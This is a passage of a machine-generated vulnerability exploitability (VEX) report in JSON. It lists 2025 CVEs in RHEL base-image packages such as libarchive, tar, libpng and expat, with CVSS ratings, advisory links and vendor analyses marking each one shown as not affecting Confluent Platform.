          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can be triggered when file streams are piped into bsdtar, potentially allowing for reading past the end of the file. This out-of-bounds read can lead to unintended consequences, including unpredictable program behavior, memory corruption, or a denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5918"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5918"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370877"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2584"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5918"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5918"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2026-06-30T11:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-60753",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400,
        835
      ],
      "description": "An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-60753"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-60753"
        },
        {
          "url": "https://github.com/Papya-j/CVE/tree/main/CVE-2025-60753"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/2725"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60753"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-60753"
        }
      ],
      "published": "2025-11-05T16:15:40+00:00",
      "updated": "2026-06-17T09:50:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-64118",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        362,
        367
      ],
      "description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64118"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64118"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9"
        },
        {
          "url": "https://github.com/isaacs/node-tar/issues/445"
        },
        {
          "url": "https://github.com/isaacs/node-tar/pull/446"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64118"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64118"
        }
      ],
      "published": "2025-10-30T18:15:33+00:00",
      "updated": "2026-06-17T09:53:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-64505",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64505"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64505"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37%20%28v1.6.51%29"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/748"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64505"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7924-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8081-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64505"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/11/22/1"
        }
      ],
      "published": "2025-11-25T00:15:47+00:00",
      "updated": "2026-06-17T09:54:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-64506",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From version 1.6.0 to before 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_write_image_8bit function when processing 8-bit images through the simplified write API with convert_to_8bit enabled. The vulnerability affects 8-bit grayscale+alpha, RGB/RGBA, and images with incomplete row data. A conditional guard incorrectly allows 8-bit input to enter code expecting 16-bit input, causing reads up to 2 bytes beyond allocated buffer boundaries. This issue has been patched in version 1.6.51.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64506"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64506"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/2bd84c019c300b78e811743fbcddb67c9d9bf821%20%28v1.6.51%29"
        },
        {
          "url": "https://github.com/pnggroup/libpng/pull/749"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-qpr4-xm66-hww6"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64506"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7924-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64506"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/11/22/1"
        }
      ],
      "published": "2025-11-25T00:15:47+00:00",
      "updated": "2026-06-17T09:54:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-66382",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-66382"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/12/02/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-66382"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1076"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66382"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-66382"
        }
      ],
      "published": "2025-11-28T07:15:57+00:00",
      "updated": "2026-06-17T09:56:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
